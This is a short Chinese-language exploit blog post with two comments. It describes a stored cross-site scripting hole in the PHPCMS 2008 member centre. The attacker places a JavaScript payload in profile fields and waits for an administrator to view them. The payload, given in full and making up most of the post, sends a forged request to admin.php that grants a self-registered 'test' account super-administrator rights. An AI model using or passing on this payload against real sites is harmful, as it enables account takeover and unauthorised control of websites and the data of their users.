phpcms2008会员中心某处xss

by 0day5_Saline

首先去注册一个会员,然后到会员中心随处修改资料,写入xss代码。诱发管理后台点击

[php]
function ajax(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
var _x = ajax();
adduser();
function adduser() {
src="admin.php?mod=phpcms&file=admin&action=add"; data="admin%5Busername%5D=test&admin%5Balloweditpassword%5D=1&roleids%5B%5D=1&admin%5Bdisabled%5D=0&dosubmit=+%C8%B7%B6%A8+";
xhr_act("POST",src,data);
}

function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
}[/php]
后台会自动加把用户test提升为超级管理员
1
2

2 条评论

  1. sugen

    ... test 密码是多少

    1. 0day5
      @sugen

      test用户是自己注册的。给出的js代码只是把test提升为管理而已

发表评论